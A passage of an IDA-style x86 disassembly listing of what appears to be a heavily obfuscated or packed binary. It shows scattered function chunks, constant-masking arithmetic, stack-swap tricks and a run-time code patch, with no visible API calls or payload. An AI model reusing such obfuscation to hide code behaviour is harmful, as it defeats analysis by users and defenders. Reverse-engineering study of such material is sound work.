; START OF FUNCTION CHUNK FOR sub_42284F
loc_42AE83: ; CODE XREF: sub_42284F+66F1�j
jmp loc_426A0E
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_42AE88: ; CODE XREF: sub_423614:loc_4256D0�j
jz loc_42665B
jmp loc_4230E6
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C473
loc_42AE93: ; CODE XREF: sub_42C473:loc_4273D7�j
call sub_426E5C
push offset loc_429FBC
jmp nullsub_195
; END OF FUNCTION CHUNK FOR sub_42C473
; ---------------------------------------------------------------------------
mov [ebp-10h], eax
; START OF FUNCTION CHUNK FOR sub_4271A0
loc_42AEA5: ; CODE XREF: sub_4271A0:loc_4282F2�j
mov eax, [ebp-10h]
call sub_428954
; END OF FUNCTION CHUNK FOR sub_4271A0
; START OF FUNCTION CHUNK FOR sub_422764
loc_42AEAD: ; CODE XREF: sub_422764-C6E�j
jmp nullsub_136
; END OF FUNCTION CHUNK FOR sub_422764
; =============== S U B R O U T I N E =======================================
sub_42AEB2 proc near ; CODE XREF: sub_427B35+6�p
; _94j21ax3:0042967D�j
; FUNCTION CHUNK AT 0042BC46 SIZE 0000000A BYTES
xchg esi, [esp+0]
pop esi
push edi
push 3B7D3554h
pop edi
add edi, 0C4C54C17h
jmp loc_42BC46
sub_42AEB2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_42AEC8: ; CODE XREF: sub_42C1AE+17�j
jz loc_424D01
jmp loc_42178F
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42306C
loc_42AED3: ; CODE XREF: sub_42306C+10�j
mov edx, [ebp+8]
or [edx-8], eax
; END OF FUNCTION CHUNK FOR sub_42306C
; START OF FUNCTION CHUNK FOR sub_427AEB
loc_42AED9: ; CODE XREF: sub_427AEB+8�j
; sub_42B3E4+11B2�j ...
jz loc_4211AE
cmp dword ptr [ebp-14h], 4
jmp loc_422DC2
; END OF FUNCTION CHUNK FOR sub_427AEB
; ---------------------------------------------------------------------------
or ebx, 2C639F09h
jmp sub_42284F
; ---------------------------------------------------------------------------
loc_42AEF3: ; DATA XREF: sub_421A4F+9401�o
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42875C
loc_42AEF5: ; CODE XREF: sub_42875C+E�j
jmp loc_4282AE
; END OF FUNCTION CHUNK FOR sub_42875C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3E4
loc_42AEFA: ; CODE XREF: sub_42B3E4+E�j
cmp dword ptr [ebp-10h], 1
jnz loc_42C59B
mov eax, [ebp+8]
mov eax, [eax-8]
or eax, 8
jmp loc_42C58D
; END OF FUNCTION CHUNK FOR sub_42B3E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_42AF12: ; CODE XREF: sub_42C057-998F�j
rol edi, 0Dh
pop ecx
loc_42AF16: ; CODE XREF: sub_42C057:loc_4281DE�j
push 0
push edi
push 7C83B8CDh
pop edi
loc_42AF1F: ; CODE XREF: _94j21ax3:004242EF�j
add edi, 837C4733h
xchg edi, [esp+0]
jmp loc_421C99
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A56
loc_42AF2D: ; CODE XREF: sub_423A56:loc_4263FC�j
lea eax, [ebp-24h]
push eax
push 40h
lea eax, [ebp-64h]
push eax
push 400000h
jmp loc_422E19
; END OF FUNCTION CHUNK FOR sub_423A56
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B43F
loc_42AF42: ; CODE XREF: sub_42B43F:loc_427D2F�j
mov esi, ebx
pop ebx
add esi, 69092FD9h
xchg esi, [esp+4+var_4]
jmp loc_42A832
; END OF FUNCTION CHUNK FOR sub_42B43F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4226AE
loc_42AF53: ; CODE XREF: sub_4226AE:loc_421783�j
add ebx, 0E2D29D1Eh
add ebx, ebp
push ecx
push 21D9C0Bh
pop ecx
sub ecx, 619A1D8h
test ecx, 8000000h
jmp loc_429308
; END OF FUNCTION CHUNK FOR sub_4226AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_42AF73: ; CODE XREF: sub_4221B8:loc_42AC71�j
or edi, 9B9208BDh
jnz loc_425A2A
loc_42AF7F: ; CODE XREF: sub_42191F+A33D�j
jmp loc_42B942
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_42AF84: ; CODE XREF: sub_42284F+4CED�j
jmp loc_421B98
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42AF89: ; CODE XREF: sub_423FCD-1CF9�j
jmp loc_429930
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
sub ecx, ebx
push 875B9F68h
jmp loc_425A2A
; ---------------------------------------------------------------------------
loc_42AF9A: ; CODE XREF: _94j21ax3:004210E2�j
; _94j21ax3:0042898E�j
mov [esp], ecx
pop ecx
lea eax, nullsub_11
js loc_42A071
mov byte ptr [eax], 0C3h
call sub_42574E
loc_42AFB2: ; CODE XREF: _94j21ax3:loc_4225E0�j
push offset sub_427773
jmp loc_42AFE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423717
loc_42AFBC: ; CODE XREF: sub_423717:loc_423732�j
xchg edi, [esp-4+arg_0]
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_423717
; ---------------------------------------------------------------------------
sub edi, 684FDB7Ah
sbb ebx, ecx
jmp sub_428418
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42AFD1: ; CODE XREF: sub_42C0BC:loc_42320D�j
pop esi
and eax, ebp
sbb ebx, 0C8476784h
jmp loc_426BBE
; END OF FUNCTION CHUNK FOR sub_42C0BC
; =============== S U B R O U T I N E =======================================
sub_42AFDF proc near ; CODE XREF: _94j21ax3:004280EA�j
; DATA XREF: sub_4266F6:loc_4280E0�o
rol eax, 5
push eax
retn
sub_42AFDF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AFE4: ; CODE XREF: _94j21ax3:0042AFB7�j
jmp locret_421F44
; ---------------------------------------------------------------------------
loc_42AFE9: ; CODE XREF: _94j21ax3:00428B13�j
jmp loc_42BDEE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AFEE proc near ; CODE XREF: _94j21ax3:0042A2D7�p
; FUNCTION CHUNK AT 00428B50 SIZE 00000004 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
mov ebp, offset sub_428B5E
jmp loc_428B50
sub_42AFEE endp
; =============== S U B R O U T I N E =======================================
sub_42AFFE proc near ; CODE XREF: _94j21ax3:00422342�j
; _94j21ax3:loc_426ABD�p
xchg edi, [esp+0]
pop edi
add ecx, ebp
add ecx, 0AFBF9EB9h
jmp loc_42945A
sub_42AFFE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_42B00F: ; CODE XREF: sub_42426B-24FD�j
mov edx, esp
push edx
push 0BCE60B3Ch
sub [esp+18h+var_18], 0BCE60B3Ch
push eax
lea eax, sub_427C35
push eax
jmp loc_428247
; END OF FUNCTION CHUNK FOR sub_42426B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250F7
loc_42B02B: ; CODE XREF: sub_4250F7:loc_42825F�j
jnz loc_42392A
jmp loc_429DDC
; END OF FUNCTION CHUNK FOR sub_4250F7
; ---------------------------------------------------------------------------
loc_42B036: ; CODE XREF: _94j21ax3:00424F68�j
jb nullsub_83
; =============== S U B R O U T I N E =======================================
sub_42B03C proc near ; CODE XREF: sub_4215F9+6�p
; FUNCTION CHUNK AT 00423BB4 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00424D53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042740E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427F9A SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00427FAC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042BF94 SIZE 00000019 BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_42BF94
sub_42B03C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sbb esi, edx
jmp sub_42A919
; =============== S U B R O U T I N E =======================================
sub_42B052 proc near ; CODE XREF: sub_4281A5-A02�p
; _94j21ax3:00428124�j
xchg edi, [esp+0]
pop edi
add esp, 4
push offset loc_4242E5
jmp nullsub_138
sub_42B052 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42B064: ; CODE XREF: sub_423FCD+1261�j
jmp loc_4290FA
; END OF FUNCTION CHUNK FOR sub_423FCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422F0A
loc_42B06A: ; CODE XREF: sub_422F0A+8A0A�j
jmp nullsub_198
; END OF FUNCTION CHUNK FOR sub_422F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423284
loc_42B06F: ; CODE XREF: sub_423284-D8B�j
jmp loc_42B6F1
; END OF FUNCTION CHUNK FOR sub_423284
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42B075 proc near ; CODE XREF: sub_42848B:loc_42782E�p
mov [esp+0], eax
retn
sub_42B075 endp
; =============== S U B R O U T I N E =======================================
sub_42B079 proc near ; CODE XREF: sub_428620-660F�j
; _94j21ax3:004234EC�p ...
; FUNCTION CHUNK AT 0042ABC6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042C414 SIZE 00000005 BYTES
call sub_424EB4
loc_42B07E: ; CODE XREF: sub_423324+64D1�j
jmp loc_42ABC6
sub_42B079 endp
; ---------------------------------------------------------------------------
loc_42B083: ; CODE XREF: _94j21ax3:00424C30�j
jmp loc_4282B9
; ---------------------------------------------------------------------------
loc_42B088: ; CODE XREF: _94j21ax3:004236DD�j
jmp loc_4253C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423505
loc_42B08D: ; CODE XREF: sub_423505+D�j
jmp nullsub_206
; END OF FUNCTION CHUNK FOR sub_423505
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A8BB
loc_42B092: ; CODE XREF: sub_42A8BB+7�j
mov eax, ds:dword_42409C
or eax, eax
jnz loc_426DE1
jmp loc_42280A
; END OF FUNCTION CHUNK FOR sub_42A8BB
; ---------------------------------------------------------------------------
xor ebp, 0C7196BCBh
jmp sub_424B76
; ---------------------------------------------------------------------------
mov [ebx], edx
jmp sub_422DF2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42269A
loc_42B0B8: ; CODE XREF: sub_42269A:loc_428757�j
jz loc_429FE9
add esi, 5BF6ED80h
jmp loc_429E3C
; END OF FUNCTION CHUNK FOR sub_42269A
; =============== S U B R O U T I N E =======================================
sub_42B0C9 proc near ; CODE XREF: sub_427F1C:loc_4239BF�p
; _94j21ax3:0042B9F4�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00422B90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429817 SIZE 0000000F BYTES
mov [esp+0], edx
pop edx
xchg esi, [esp+0]
push ebx
push 32948371h
jmp loc_422B90
sub_42B0C9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42B0DB: ; CODE XREF: sub_423FCD+F�j
jz loc_42BB70
jmp loc_4291CF
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421388
loc_42B0E6: ; CODE XREF: sub_421388:loc_4239CE�j
add eax, ds:4000FAh
xor eax, 0A9BB5FE8h
add eax, ebp
add eax, 62B4BAFBh
mov eax, [eax]
jmp loc_426B34
; END OF FUNCTION CHUNK FOR sub_421388
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42220B
loc_42B101: ; CODE XREF: sub_42220B-E19�j
not esi
jmp loc_42B7EF
; END OF FUNCTION CHUNK FOR sub_42220B
; ---------------------------------------------------------------------------
loc_42B108: ; CODE XREF: _94j21ax3:0042AC81�j
or edx, eax
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42B10A: ; CODE XREF: sub_423F55:loc_42AC6B�j
add ecx, 0A9A75C0Fh
; END OF FUNCTION CHUNK FOR sub_423F55
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_42B110: ; CODE XREF: sub_421CAA:loc_4225C2�j
xchg ecx, [esp-4+arg_0]
jmp sub_42BA8A
; END OF FUNCTION CHUNK FOR sub_421CAA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_42B119: ; CODE XREF: sub_42972F+1FC�j
jmp loc_42987B
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
cmp eax, ebx
jmp loc_424EF4
; ---------------------------------------------------------------------------
push 91CD4E28h
jmp sub_42A430
; ---------------------------------------------------------------------------
jl loc_42ABCF
jmp sub_422866
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231CD
loc_42B13A: ; CODE XREF: sub_4231CD+5�j
ror eax, 12h
mov ds:dword_4219C4, eax
retn
; END OF FUNCTION CHUNK FOR sub_4231CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425934
loc_42B144: ; CODE XREF: sub_425934-3D49�j
rol eax, 12h
jmp loc_4251C1
; END OF FUNCTION CHUNK FOR sub_425934
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42131B
loc_42B14D: ; CODE XREF: sub_42131B+AFC2�j
cmp eax, ds:dword_423454
jz loc_42A3E2
mov eax, [ebp+var_C]
cmp eax, ds:dword_422264
jz loc_42A3E2
mov eax, [ebp+var_C]
jmp loc_424C06
; END OF FUNCTION CHUNK FOR sub_42131B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C35
loc_42B170: ; CODE XREF: sub_427C35+6�j
push edi
xchg ebp, edi
mov eax, [ebp+arg_0]
mov ecx, [eax]
jmp loc_42362D
; END OF FUNCTION CHUNK FOR sub_427C35
; ---------------------------------------------------------------------------
mov eax, edi
jmp sub_425B77
; ---------------------------------------------------------------------------
loc_42B184: ; DATA XREF: sub_423324+2238�o
add edx, 489FE4D7h
xchg edx, [esp]
jmp sub_42780F
; ---------------------------------------------------------------------------
ror edx, 8
jmp sub_42773C
; ---------------------------------------------------------------------------
loc_42B19A: ; DATA XREF: sub_42878A-1A74�o
add esi, 0FC29AB28h
xchg esi, [esp]
jmp loc_42482A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42B1A8: ; CODE XREF: sub_421F28:loc_429205�j
push edx
push 0FAB32C7Bh
pop edx
and edx, 502E25DEh
jmp loc_429A51
; END OF FUNCTION CHUNK FOR sub_421F28
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42B1BB proc near ; CODE XREF: sub_42651A+1E�p
; _94j21ax3:0042C582�j
; FUNCTION CHUNK AT 0042B3CA SIZE 0000001A BYTES
mov [esp+0], ecx
pop ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42C498
or eax, eax
jmp loc_42B3CA
sub_42B1BB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C03F
loc_42B1CF: ; CODE XREF: sub_42C03F:loc_42AAA4�j
jz loc_421058
jmp loc_427208
; END OF FUNCTION CHUNK FOR sub_42C03F
; ---------------------------------------------------------------------------
mov ds:dword_4256CC, eax
; START OF FUNCTION CHUNK FOR sub_427CB6
loc_42B1DF: ; CODE XREF: sub_427CB6+7�j
lea eax, [ebp-14h]
loc_42B1E2: ; CODE XREF: _94j21ax3:00421D99�j
call sub_429054
; END OF FUNCTION CHUNK FOR sub_427CB6
; START OF FUNCTION CHUNK FOR sub_421689
loc_42B1E7: ; CODE XREF: sub_421689+8DFD�j
jmp loc_4267AE
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42B1EC: ; CODE XREF: sub_42B9CF-9D06�j
; sub_42B9CF:loc_42672B�j
call sub_42B1F2
locret_42B1F1: ; CODE XREF: _94j21ax3:004267B9�j
retn
; END OF FUNCTION CHUNK FOR sub_42B9CF
; =============== S U B R O U T I N E =======================================
sub_42B1F2 proc near ; CODE XREF: sub_424692+C�p
; sub_42B9CF:loc_42B1EC�p
call sub_422898
sub_42B1F2 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42A277
loc_42B1F7: ; CODE XREF: sub_42A277+C�j
jz loc_425233
jmp loc_422FA3
; END OF FUNCTION CHUNK FOR sub_42A277
; =============== S U B R O U T I N E =======================================
sub_42B202 proc near ; DATA XREF: sub_429B81-1DFE�o
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00428D33 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA18 SIZE 00000008 BYTES
push 0A38870CEh
mov [esp+4+var_4], eax
push edi
push 197866BEh
xchg esi, [esp+0Ch+var_C]
mov edi, esi
pop esi
add edi, 0E6C9E86Eh
jmp loc_428D33
sub_42B202 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42B221: ; CODE XREF: sub_422EB0:loc_42AE17�j
mov ebp, [ecx]
jmp loc_428553
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425301
loc_42B228: ; CODE XREF: sub_425301+D�j
xor edx, edx
div ecx
mov [ebp-20h], edx
mov ecx, [ebp-14h]
push eax
jmp loc_42BEA2
; END OF FUNCTION CHUNK FOR sub_425301
; =============== S U B R O U T I N E =======================================
sub_42B238 proc near ; CODE XREF: sub_423614:loc_4251E8�p
; _94j21ax3:0042B2FE�j
; FUNCTION CHUNK AT 004227AC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00422A7B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004251ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042657F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00426832 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00428390 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004294FA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AA5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C0CF SIZE 00000010 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, ds:dword_429F74
push 99A8AA5Bh
pop edx
add edx, 5A0566CAh
rol edx, 1Eh
jmp loc_426832
sub_42B238 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42B255: ; CODE XREF: _94j21ax3:loc_42C070�j
rol eax, 1Bh
call sub_429352
; START OF FUNCTION CHUNK FOR sub_42A440
loc_42B25D: ; CODE XREF: sub_42A440:loc_42569C�j
call sub_42A770
loc_42B262: ; CODE XREF: _94j21ax3:00429D92�j
mov [ecx], esi
; END OF FUNCTION CHUNK FOR sub_42A440
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_42B264: ; CODE XREF: sub_4258EB-AC1�j
; _94j21ax3:loc_429D7B�j
rol edx, 0Bh
xor edx, 0E5B5356Eh
call sub_4257BC
loc_42B272: ; CODE XREF: sub_4214E6:loc_4290DF�j
; sub_423324+8B79�j
mov eax, [ebp-0Ch]
push eax
call sub_42B079
; END OF FUNCTION CHUNK FOR sub_4258EB
; START OF FUNCTION CHUNK FOR sub_4214E6
loc_42B27B: ; CODE XREF: sub_4214E6+1473�j
mov eax, 120h
call sub_425A09
jmp loc_429138
; END OF FUNCTION CHUNK FOR sub_4214E6
; ---------------------------------------------------------------------------
mov dword ptr [ebp-8], 1
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_42B291: ; CODE XREF: _94j21ax3:00427BAE�j
; sub_42AA5F-676�j
mov eax, [ebp-8]
jmp loc_4215EA
; END OF FUNCTION CHUNK FOR sub_42AA5F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_178. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B487
loc_42B29A: ; CODE XREF: sub_42B487+F�j
jmp loc_422DAC
; END OF FUNCTION CHUNK FOR sub_42B487
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42552D
loc_42B29F: ; CODE XREF: sub_42552D+7�j
jmp loc_428FC8
; END OF FUNCTION CHUNK FOR sub_42552D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423EAE
loc_42B2A4: ; CODE XREF: sub_423EAE+3�j
jmp loc_427D8D
; END OF FUNCTION CHUNK FOR sub_423EAE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CF
loc_42B2A9: ; CODE XREF: sub_42B9CF:loc_429487�j
test al, al
jz loc_421ED8
jmp loc_426F30
; END OF FUNCTION CHUNK FOR sub_42B9CF
; ---------------------------------------------------------------------------
popf
jmp sub_4247D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426985
loc_42B2BC: ; CODE XREF: _94j21ax3:loc_423279�j
; sub_426985+11�j
mov eax, [ebp-18h]
add eax, eax
cdq
add eax, [esp+4+var_4]
adc edx, [esp+4]
add esp, 8
push offset loc_421B47
jmp loc_425175
; END OF FUNCTION CHUNK FOR sub_426985
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_135. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423081
loc_42B2D7: ; CODE XREF: sub_423081+6F90�j
jmp loc_428ECD
; END OF FUNCTION CHUNK FOR sub_423081
; ---------------------------------------------------------------------------
loc_42B2DC: ; CODE XREF: _94j21ax3:00427A50�j
jmp loc_42C3B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_42B2E1: ; CODE XREF: sub_421F28-170�j
jmp loc_423CBF
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
push eax
push 1CDAA640h
pop eax
add eax, 0E3676F87h
xchg eax, [esp]
jmp loc_423D5F
; ---------------------------------------------------------------------------
shl eax, 1Dh
jmp sub_42B238
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C3BD
loc_42B303: ; CODE XREF: sub_42C3BD-211B�j
jnz loc_42273A
jmp loc_423379
; END OF FUNCTION CHUNK FOR sub_42C3BD
; ---------------------------------------------------------------------------
loc_42B30E: ; CODE XREF: _94j21ax3:0042A76A�j
or edi, 0A2A3B9EFh
; =============== S U B R O U T I N E =======================================
sub_42B314 proc near ; CODE XREF: sub_422C48+5E8D�p
; FUNCTION CHUNK AT 00423D42 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004265EA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429750 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B54E SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 0CE7404DCh
mov eax, [eax]
mov eax, [eax]
and eax, 0FFFFFFh
jmp loc_4265EA
sub_42B314 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
ror edx, 0Bh
jmp loc_42A369
; ---------------------------------------------------------------------------
xchg ecx, ebp
jmp sub_429163
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DA4
loc_42B33B: ; CODE XREF: sub_426DA4-30AC�j
push 0E7BE614Dh
pop eax
xor eax, 71491B32h
add eax, ebp
add eax, 6908857Dh
mov eax, [eax]
popf
push eax
jmp loc_42A73C
; END OF FUNCTION CHUNK FOR sub_426DA4
; =============== S U B R O U T I N E =======================================
sub_42B358 proc near ; CODE XREF: sub_42484C-1716�j
; sub_425157:loc_4275C6�p
; FUNCTION CHUNK AT 004217B2 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00421F86 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424E88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004295C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AD61 SIZE 00000013 BYTES
mov [esp+0], ecx
pop ecx
xchg ecx, esi
push 0FFFFFFF1h
call sub_42BF1B
push eax
call sub_42A389
jmp loc_424E88
sub_42B358 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42B370: ; CODE XREF: sub_42484C:loc_42275A�j
add ecx, ebp
add ecx, 0FA85E4C3h
mov ecx, [ecx]
call sub_423081
; END OF FUNCTION CHUNK FOR sub_42484C
; START OF FUNCTION CHUNK FOR sub_4237DC
loc_42B37F: ; CODE XREF: sub_4237DC+205B�j
jmp nullsub_141
; END OF FUNCTION CHUNK FOR sub_4237DC
; =============== S U B R O U T I N E =======================================
sub_42B384 proc near ; DATA XREF: sub_421DC4+9B9C�o
add eax, 0E3A6FF25h
add eax, ebp
push offset loc_423D64
jmp nullsub_157
sub_42B384 endp
; =============== S U B R O U T I N E =======================================
sub_42B396 proc near ; CODE XREF: sub_429D19+750�p
; FUNCTION CHUNK AT 00426575 SIZE 00000005 BYTES
push offset sub_423917
jmp loc_426575
sub_42B396 endp
; ---------------------------------------------------------------------------
loc_42B3A0: ; DATA XREF: sub_42A358+7�o
mov eax, (offset loc_426F36+2)
call sub_424E34
cmp ds:dword_426F44, 0
jnz loc_42B891
lea edx, [ebp-14h]
jmp loc_425248
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD03
loc_42B3BF: ; CODE XREF: sub_42BD03-9A50�j
jnz loc_421D09
jmp loc_429CBF
; END OF FUNCTION CHUNK FOR sub_42BD03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1BB
loc_42B3CA: ; CODE XREF: _94j21ax3:loc_4296BC�j
; sub_42B1BB+F�j
jnz loc_424BC3
call sub_42574E
mov edx, 0B9726E5Ah
call sub_4239A5
call sub_424BAA
; END OF FUNCTION CHUNK FOR sub_42B1BB
; =============== S U B R O U T I N E =======================================
sub_42B3E4 proc near ; CODE XREF: _94j21ax3:004243ED�j
; sub_4298A8+7�p
; FUNCTION CHUNK AT 00425965 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042AEFA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042C58D SIZE 0000001D BYTES
mov [esp+0], edx
pop edx
jnz loc_427AF8
cmp dword ptr [ebp-10h], 0
jnz loc_42AEFA
mov eax, [ebp+8]
push offset sub_4210BC
jmp nullsub_142
sub_42B3E4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B405 proc near ; CODE XREF: sub_423081+7�p
; _94j21ax3:00424F27�j
; FUNCTION CHUNK AT 0042375D SIZE 0000000D BYTES
xchg esi, [esp+0]
pop esi
push 9BA88001h
pop eax
add eax, 64578000h
jmp loc_42375D
sub_42B405 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427849
loc_42B41A: ; CODE XREF: sub_427849:loc_42207B�j
cmp byte ptr [eax], 0EBh
loc_42B41D: ; CODE XREF: sub_427849:loc_42A598�j
jz loc_421CE0
mov eax, [ebp-4]
mov al, [eax]
and al, 0F6h
jmp loc_4211D3
; END OF FUNCTION CHUNK FOR sub_427849
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42B42F: ; CODE XREF: sub_423F55:loc_42C200�j
mov eax, [ebp-4]
inc eax
mov eax, [eax]
call sub_426C7A
; END OF FUNCTION CHUNK FOR sub_423F55
; START OF FUNCTION CHUNK FOR sub_426612
loc_42B43A: ; CODE XREF: sub_426612+9�j
jmp sub_427004
; END OF FUNCTION CHUNK FOR sub_426612
; =============== S U B R O U T I N E =======================================
sub_42B43F proc near ; DATA XREF: _94j21ax3:loc_4284B6�o
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00427D2F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A832 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AF42 SIZE 00000011 BYTES
xor edx, 0F8B3E046h
call sub_4239A5
push esi
push 9738FBA5h
